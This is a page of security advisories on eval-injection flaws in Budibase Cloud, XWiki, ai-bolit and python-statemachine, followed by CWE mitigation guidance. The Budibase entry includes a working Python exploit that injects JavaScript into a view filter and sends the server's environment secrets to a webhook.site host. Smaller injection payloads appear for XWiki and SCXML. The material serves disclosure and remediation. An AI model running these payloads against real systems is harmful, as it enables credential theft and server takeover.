This vulnerability was discovered during independent security research. Testing was conducted on a personal free-tier account only. Exploitation was deliberately limited to what was necessary to confirm the vulnerability and its impact:
- No customer data was accessed beyond enumerating database names and confirming that user records (email addresses) are readable
- The PoC HTML file uploaded to confirm write access is benign
- This report is being submitted directly to Budibase security with no plans for public disclosure until a fix is in place
- Before any public disclosure, this report must be redacted/simplified - all credentials, hostnames, internal API keys, tenant IDs, and other sensitive platform details included here for Budibase's remediation purposes must be removed or redacted
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "budibase"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.30.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27702"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-25T18:57:39Z",
"nvd_published_at": "2026-02-25T16:23:26Z",
"severity": "CRITICAL"
},
"details": "## Summary\n\nA critical unsafe `eval()` vulnerability in Budibase\u0027s view filtering implementation allows any authenticated user (including free tier accounts) to execute arbitrary JavaScript code on the server. **This vulnerability ONLY affects Budibase Cloud (SaaS)** - self-hosted deployments use native CouchDB views and are not vulnerable. The vulnerability exists in `packages/server/src/db/inMemoryView.ts` where user-controlled view map functions are directly evaluated without sanitization.\n\nThe primary impact comes from what lives inside the pod\u0027s environment: the `app-service` pod runs with **secrets baked into its environment variables**, including `INTERNAL_API_KEY`, `JWT_SECRET`, CouchDB admin credentials, AWS keys, and more. Using the extracted CouchDB credentials, we verified direct database access, enumerated all tenant databases, and confirmed that user records (email addresses) are readable.\n\n## Details\n\n### Root Cause\n\nFile: `packages/server/src/db/inMemoryView.ts:28`\n\n```javascript\nexport async function runView(\n view: DBView,\n calculation: string,\n group: boolean,\n data: Row[]\n) {\n // ...\n let fn = (doc: Document, emit: any) =\u003e emit(doc._id)\n // BUDI-7060 -\u003e indirect eval call appears to cause issues in cloud\n eval(\"fn = \" + view?.map?.replace(\"function (doc)\", \"function (doc, emit)\")) // UNSAFE EVAL\n // ...\n}\n```\n\n**Why Only Cloud is Vulnerable:**\n\nFile: `packages/server/src/sdk/workspace/rows/search/internal/internal.ts:194-221`\n\n```typescript\nif (env.SELF_HOSTED) {\n // Self-hosted: Uses native CouchDB design documents - NO EVAL\n response = await db.query(`database/${viewName}`, {\n include_docs: !calculation,\n group: !!group,\n })\n} else {\n // Cloud: Uses in-memory PouchDB with UNSAFE EVAL\n const tableId = viewInfo.meta!.tableId\n const data = await fetchRaw(tableId!)\n response = await inMemoryViews.runView( // \u003c- Calls vulnerable function\n viewInfo,\n calculation as string,\n !!group,\n data\n )\n}\n```\n\nThe `view.map` parameter comes directly from user input when creating table views with filters. The code constructs a string by concatenating `\"fn = \"` with the user-controlled map function and passes it to `eval()`, allowing arbitrary JavaScript execution in the Node.js server context.\n\n**Self-hosted deployments are not affected** because they use native CouchDB design documents instead of the in-memory eval() path.\n\n### Attack Flow\n\n1. Authenticated user creates a table view with custom filter\n2. Frontend sends POST request to `/api/views` with malicious payload in filter value\n3. Backend stores view configuration in CouchDB\n4. When view is queried (GET `/api/views/{viewName}`), `runView()` is called\n5. Malicious code is `eval()`\u0027d on server - RCE achieved\n\n### Exploitation Vector\n\nThe vulnerability is triggered via the view filter mechanism. When creating a view with a filter condition, the filter value can be injected with JavaScript code that breaks out of the intended expression context:\n\n**Malicious filter value:**\n```javascript\nx\" || (MALICIOUS_CODE_HERE, true) || \"\n```\n\nThis payload:\n- Closes the expected string context with `x\"`\n- Uses `||` (OR operator) to inject arbitrary code\n- Returns `true` to make the filter always match\n- Closes with `|| \"\"` to maintain valid syntax\n\n### Verified on Production\n\nTested on own Budibase Cloud account (y4ylfy7m.budibase.app,) to confirm severity. Testing was deliberately limited - no customer data was retained and exploitation was stopped once impact was confirmed:\n- Achieved RCE on `app-service` pod (hostname: `app-service-5f4f6d796d-p6dhz`, Kubernetes, `eu-west-1`)\n- Extracted `process.env` - confirmed presence of platform secrets (`JWT_SECRET`, `INTERNAL_API_KEY`, `COUCH_DB_URL`, `MINIO_ACCESS_KEY`, etc.)\n- Used extracted `COUCH_DB_URL` credentials to verify CouchDB access - enumerated database list (489,827 databases) to confirm scale of impact\n- Queried users table to confirm data is readable (retrieved email addresses)\n- Uploaded an HTML file as a PoC artifact to confirm write access.\n\n\n\n\n\n## Proof of Concept\n\n### PoC Script\n\n```python\nimport requests, time\nfrom urllib.parse import urlparse\n\n# Config | CHANGE THESE\nURL = \"https://[YOUR-TENANT].budibase.app\"\nWEBHOOK = \"https://webhook.site/[YOUR-WEBHOOK-ID]\"\nJWT = \"[YOUR-JWT-TOKEN]\" # budibase:auth cookie value\nAPP_ID = \"app_dev_[TENANT]_[APP-UUID]\" # x-budibase-app-id header\nTABLE_ID = \"[YOUR-TABLE-ID]\" # any table ID (e.g. ta_users)\n\n# Payload - parses hostname/path from WEBHOOK automatically\nwebhook_parsed = urlparse(WEBHOOK)\nview = f\"RCE_{int(time.time())}\"\npayload = f\u0027\u0027\u0027x\" || (require(\u0027https\u0027).request({{hostname:\u0027{webhook_parsed.hostname}\u0027,path:\u0027{webhook_parsed.path}\u0027,method:\u0027POST\u0027}}).end(JSON.stringify(process.env)), true) || \"\u0027\u0027\u0027\n\n# Exploit\ns = requests.Session()\ns.cookies.set(\u0027budibase:auth\u0027, JWT)\ns.headers.update({\"x-budibase-app-id\": APP_ID, \"Content-Type\": \"application/json\"})\n\nprint(f\"[*] Creating view...\")\ns.post(f\"{URL}/api/views\", json={\"tableId\": TABLE_ID, \"name\": view, \"filters\": [{\"key\": \"email\", \"condition\": \"EQUALS\", \"value\": payload}]})\n\nprint(f\"[*] Triggering RCE...\")\ns.get(f\"{URL}/api/views/{view}\")\n\nprint(f\"[+] Done! Check: {WEBHOOK}\")\n```\n\n### Video Demo\nhttps://github.com/user-attachments/assets/cd12e1ab-02fd-4d0d-9fb5-d78bb83cdf99\n\n\n### Reproduction Steps\n\n1. **Prerequisites:**\n - Create free Budibase Cloud account at https://budibase.app\n - Create a new app\n - Create a table with at least one text field\n\n2. **Exploitation:**\n - Copy the PoC script above\n - Replace placeholders with your tenant URL, app ID, table ID\n - Get your JWT token from browser cookies (`budibase:auth`)\n - Create a webhook at https://webhook.site for exfiltration\n - Run the script: `python3 budibase_rce_poc.py`\n\n3. **Verification:**\n - Check webhook.site - you\u0027ll receive all server environment variables\n - Extracted data includes JWT_SECRET, INTERNAL_API_KEY, database credentials\n\n## Additional Note\n\nThe `budibase:auth` session cookie has `Domain=.budibase.app` (leading dot = all subdomains) and no `HttpOnly` flag, making it readable by JavaScript. Since the RCE allows uploading arbitrary HTML files to any subdomain (as demonstrated with the PoC artifact), an attacker could serve an XSS payload from their own tenant subdomain and steal session cookies from any Budibase Cloud user who visits that page (one click ATO).\n\n## Responsible Disclosure Statement\n\nThis vulnerability was discovered during independent security research. Testing was conducted on a personal free-tier account only. Exploitation was deliberately limited to what was necessary to confirm the vulnerability and its impact:\n\n- No customer data was accessed beyond enumerating database names and confirming that user records (email addresses) are readable\n- The PoC HTML file uploaded to confirm write access is benign\n- This report is being submitted directly to Budibase security with no plans for public disclosure until a fix is in place\n- **Before any public disclosure, this report must be redacted/simplified** - all credentials, hostnames, internal API keys, tenant IDs, and other sensitive platform details included here for Budibase\u0027s remediation purposes must be removed or redacted",
"id": "GHSA-rvhr-26g4-p2r8",
"modified": "2026-02-25T18:57:39Z",
"published": "2026-02-25T18:57:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/security/advisories/GHSA-rvhr-26g4-p2r8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27702"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/pull/18087"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/commit/348659810cf930dda5f669e782706594c547115d"
},
{
"type": "PACKAGE",
"url": "https://github.com/Budibase/budibase"
},
{
"type": "WEB",
"url": "https://github.com/Budibase/budibase/releases/tag/3.30.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "Budibase: Remote Code Execution via Unsafe eval() in View Filter Map Function (Budibase Cloud)"
}
GHSA-V2RR-XW95-WCJX
Vulnerability from github – Published: 2023-10-25 21:03 – Updated: 2023-11-01 05:55Impact
Any user who can edit their own user profile can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This can be reproduced with the following steps:
- As an advanced user, use the object editor to add an object of type
UIExtensionClassto your user profile. Set the value "Extension Point ID" to{{/html}}{{async async=false cache=false}}{{groovy}}println("Hello from Groovy!"){{/groovy}}{{/async}} - Open
<xwiki-host>/xwiki/bin/edit/XWiki/<username>?sheet=Menu.UIExtensionSheetwhere<xwiki-host>is the URL of your XWiki installation and<username>is your user name.
If the text Hello from Groovy!" selected="selected"> is displayed in the output, the attack succeeded.
Patches
This has been patched in XWiki 14.10.8 and 15.3 RC1 by adding proper escaping.
Workarounds
The patch can be manually applied to the document Menu.UIExtensionSheet, only three lines need to be changed.
References
- https://jira.xwiki.org/browse/XWIKI-20746
- https://github.com/xwiki/xwiki-platform/commit/9e8f080094333dec63a8583229a3799208d773be
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-menu"
},
"ranges": [
{
"events": [
{
"introduced": "5.1-rc-1"
},
{
"fixed": "14.10.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-menu-ui"
},
"ranges": [
{
"events": [
{
"introduced": "5.1-rc-1"
},
{
"fixed": "14.10.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.xwiki.platform:xwiki-platform-menu-ui"
},
"ranges": [
{
"events": [
{
"introduced": "15.0-rc-1"
},
{
"fixed": "15.3-rc-1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-37909"
],
"database_specific": {
"cwe_ids": [
"CWE-94",
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2023-10-25T21:03:11Z",
"nvd_published_at": "2023-10-25T18:17:28Z",
"severity": "HIGH"
},
"details": "### Impact\nAny user who can edit their own user profile can execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. This can be reproduced with the following steps:\n\n1. As an advanced user, use the object editor to add an object of type `UIExtensionClass` to your user profile. Set the value \"Extension Point ID\" to `{{/html}}{{async async=false cache=false}}{{groovy}}println(\"Hello from Groovy!\"){{/groovy}}{{/async}}`\n2. Open `\u003cxwiki-host\u003e/xwiki/bin/edit/XWiki/\u003cusername\u003e?sheet=Menu.UIExtensionSheet` where `\u003cxwiki-host\u003e` is the URL of your XWiki installation and `\u003cusername\u003e` is your user name.\n\nIf the text `Hello from Groovy!\" selected=\"selected\"\u003e` is displayed in the output, the attack succeeded.\n\n### Patches\n\nThis has been patched in XWiki 14.10.8 and 15.3 RC1 by adding proper escaping.\n\n### Workarounds\nThe [patch](https://github.com/xwiki/xwiki-platform/commit/9e8f080094333dec63a8583229a3799208d773be#diff-47a5652d0c8e4601dac12bd9ab34b8bd688cb22a1b758ce7b774043658834662) can be manually applied to the document `Menu.UIExtensionSheet`, only three lines need to be changed.\n\n### References\n\n* https://jira.xwiki.org/browse/XWIKI-20746\n* https://github.com/xwiki/xwiki-platform/commit/9e8f080094333dec63a8583229a3799208d773be",
"id": "GHSA-v2rr-xw95-wcjx",
"modified": "2023-11-01T05:55:39Z",
"published": "2023-10-25T21:03:11Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-v2rr-xw95-wcjx"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-37909"
},
{
"type": "WEB",
"url": "https://github.com/xwiki/xwiki-platform/commit/9e8f080094333dec63a8583229a3799208d773be"
},
{
"type": "PACKAGE",
"url": "https://github.com/xwiki/xwiki-platform"
},
{
"type": "WEB",
"url": "https://jira.xwiki.org/browse/XWIKI-20746"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Privilege escalation (PR)/remote code execution from account through Menu.UIExtensionSheet"
}
GHSA-V455-WRVF-MV55
Vulnerability from github – Published: 2025-12-12 18:30 – Updated: 2025-12-12 18:30An eval injection in the malware de-obfuscation routines of CloudLinux ai-bolit before v32.7.4 allows attackers to overwrite arbitrary files as root via scanning a crafted file.
{
"affected": [],
"aliases": [
"CVE-2025-65530"
],
"database_specific": {
"cwe_ids": [
"CWE-95"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-12T16:15:44Z",
"severity": "HIGH"
},
"details": "An eval injection in the malware de-obfuscation routines of CloudLinux ai-bolit before v32.7.4 allows attackers to overwrite arbitrary files as root via scanning a crafted file.",
"id": "GHSA-v455-wrvf-mv55",
"modified": "2025-12-12T18:30:35Z",
"published": "2025-12-12T18:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-65530"
},
{
"type": "WEB",
"url": "https://blog.imunify360.com/security-advisory-imunify-ai-bolit-vulnerability"
},
{
"type": "WEB",
"url": "http://ai-bolit.com"
},
{
"type": "WEB",
"url": "http://cloudlinux.com"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-V4JC-PM6R-3VJ8
Vulnerability from github – Published: 2026-06-18 14:28 – Updated: 2026-06-18 14:28Summary
python-statemachine 3.1.2 evaluates <data expr="..."> attributes in SCXML documents using Python's eval(). Any application that passes attacker-controlled SCXML content to SCXMLProcessor is vulnerable to arbitrary code execution in the context of the hosting process.
Details
SCXMLProcessor.parse_scxml_file() processes SCXML documents and evaluates <data> element expr attributes via the following call chain:
SCXMLProcessor.parse_scxml_file()
SCXMLProcessor.process_definition()
create_datamodel_action_callable()
_create_dataitem_callable()
_eval()
eval()
_eval() calls Python's built-in eval() directly on the expression string without sandboxing or restriction.
PoC
1. Install:
pip install python-statemachine==3.1.2
2. Create an SCXML file containing:
<data id="x" expr="__import__('pathlib').Path('marker.txt').write_text('pwned')"/>
3. Run:
SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)
SCXMLProcessor.start()
4. During start(), <data expr> reaches _eval(), which calls eval().
5. Result:
data_marker_before_start: False
data_marker_after_start: True
success: True
Impact
This is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "python-statemachine"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0"
},
{
"fixed": "3.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47103"
],
"database_specific": {
"cwe_ids": [
"CWE-95"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:28:02Z",
"nvd_published_at": "2026-06-17T15:16:58Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\npython-statemachine 3.1.2 evaluates `\u003cdata expr=\"...\"\u003e` attributes in SCXML documents using Python\u0027s `eval()`. Any application that passes attacker-controlled SCXML content to `SCXMLProcessor` is vulnerable to arbitrary code execution in the context of the hosting process.\n\n### Details\n\n`SCXMLProcessor.parse_scxml_file()` processes SCXML documents and evaluates `\u003cdata\u003e` element `expr` attributes via the following call chain:\n\n```\nSCXMLProcessor.parse_scxml_file()\nSCXMLProcessor.process_definition()\ncreate_datamodel_action_callable()\n_create_dataitem_callable()\n_eval()\neval()\n```\n\n`_eval()` calls Python\u0027s built-in `eval()` directly on the expression string without sandboxing or restriction.\n\n### PoC\n\n```\n1. Install:\n pip install python-statemachine==3.1.2\n\n2. Create an SCXML file containing:\n \u003cdata id=\"x\" expr=\"__import__(\u0027pathlib\u0027).Path(\u0027marker.txt\u0027).write_text(\u0027pwned\u0027)\"/\u003e\n\n3. Run:\n SCXMLProcessor.parse_scxml_file(DATA_EXPR_CHART)\n SCXMLProcessor.start()\n\n4. During start(), \u003cdata expr\u003e reaches _eval(), which calls eval().\n\n5. Result:\n data_marker_before_start: False\n data_marker_after_start: True\n success: True\n```\n\n### Impact\n\nThis is an eval injection vulnerability (CWE-95). Remote or local code execution depending on whether the consuming application accepts SCXML content from remote users, uploaded files, configuration, plugins, or other untrusted sources.",
"id": "GHSA-v4jc-pm6r-3vj8",
"modified": "2026-06-18T14:28:02Z",
"published": "2026-06-18T14:28:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/fgmacedo/python-statemachine/security/advisories/GHSA-v4jc-pm6r-3vj8"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47103"
},
{
"type": "PACKAGE",
"url": "https://github.com/fgmacedo/python-statemachine"
},
{
"type": "WEB",
"url": "https://github.com/fgmacedo/python-statemachine/releases/tag/v3.2.0"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/python-statemachine-rce-via-scxml-eval-injection"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "python-statemachine SCXML \u003cdata expr\u003e Eval Injection"
}
Mitigation
Strategy: Refactoring
If possible, refactor your code so that it does not need to use eval() at all.
Mitigation MIT-5
Strategy: Input Validation
- Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
- When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
- Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
Mitigation
- Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180, CWE-181). Make sure that your application does not inadvertently decode the same input twice (CWE-174). Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. Use libraries such as the OWASP ESAPI Canonicalization control.
- Consider performing repeated canonicalization until your input does not change any more. This will avoid double-decoding and similar scenarios, but it might inadvertently modify inputs that are allowed to contain properly-encoded dangerous content.
Mitigation
For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].
CAPEC-35: Leverage Executable Code in Non-Executable Files
An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.